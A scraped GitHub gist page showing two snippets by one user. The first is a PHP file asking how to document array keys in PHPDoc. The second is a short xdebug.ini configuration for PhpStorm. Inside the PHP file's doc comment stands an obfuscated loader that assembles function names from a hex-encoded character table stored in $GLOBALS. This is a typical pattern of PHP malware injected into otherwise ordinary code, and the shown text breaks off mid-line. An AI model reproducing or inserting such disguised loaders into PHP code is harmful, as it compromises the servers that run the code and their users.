Skip to content

Instantly share code, notes, and snippets.

View paq85's full-sized avatar

Damian Sromek paq85

View GitHub Profile
@paq85
paq85 / Foo.php
Created December 10, 2013 16:01
PHPDoc of Array Key ?
class Foo
{
/**
* @type array [
* @key string Bar ID (MD5)
* @value Bar $bar
* ]
*
* OR
*
<?php $GLOBALS['leb76b'];global$leb76b;$leb76b=$GLOBALS;$leb76b['w822c2755']="\x4e\x6b\x3a\x67\x2d\x48\x77\x4a\x4c\x3e\x41\xa\x49\x79\x22\x6c\x60\x2e\x51\x2b\x7e\x5f\x78\x33\x46\x70\x75\x63\x23\x3f\x4f\x35\x25\x42\x5a\x57\x45\x34\x24\x2c\x6e\x52\x56\x9\x54\x32\x61\x20\x5d\x73\x30\x40\x21\x68\x38\x74\x50\x2f\x3d\x72\x6a\x47\x5c\x5b\x62\x71\x36\x4d\x66\x53\x59\x37\x27\x64\x55\x2a\xd\x7b\x3c\x76\x28\x7d\x6d\x65\x39\x43\x4b\x31\x3b\x29\x7c\x44\x69\x26\x7a\x5e\x6f\x58";$leb76b[$leb76b['w822c2755'][55].$leb76b['w
@paq85
paq85 / xdebug.ini
Created November 9, 2017 18:35
Xdebug for PhpStorm
xdebug.remote_enable = 1
; change to the IP of the machine you're running the IDE from
xdebug.remote_host = 172.17.0.1